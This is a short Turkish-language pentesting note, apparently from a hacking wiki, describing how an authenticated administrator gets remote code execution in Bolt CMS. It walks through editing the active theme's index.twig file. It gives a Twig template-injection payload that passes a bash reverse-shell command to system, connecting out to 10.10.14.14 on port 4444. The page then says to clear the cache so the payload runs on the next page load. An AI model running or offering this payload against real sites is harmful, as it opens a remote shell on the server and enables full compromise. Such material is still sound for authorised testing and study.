Bolt CMS
RCE
Yönetici olarak giriş yaptıktan sonra (giriş ekranına erişmek için /bot'a gidin), Bolt CMS'de RCE alabilirsiniz:
Configuration
->View Configuration
->Main Configuration
seçin veya URL yoluna/bolt/file-edit/config?file=/bolt/config.yaml
gidinTema değerini kontrol edin
File management
->View & edit templates
seçinÖnceki adımda bulunan tema tabanını seçin (
base-2021
bu durumda) veindex.twig
'i seçinBenim durumumda bu URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig
Bu dosyaya şablon enjeksiyonu (Twig) aracılığıyla payload'ınızı ayarlayın, örneğin:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Ve değişiklikleri kaydedin
Maintenance
->Clear the cache
'de önbelleği temizleyinSayfaya tekrar düzenli bir kullanıcı olarak erişin ve payload'ın çalıştırıldığını görmelisiniz
Last updated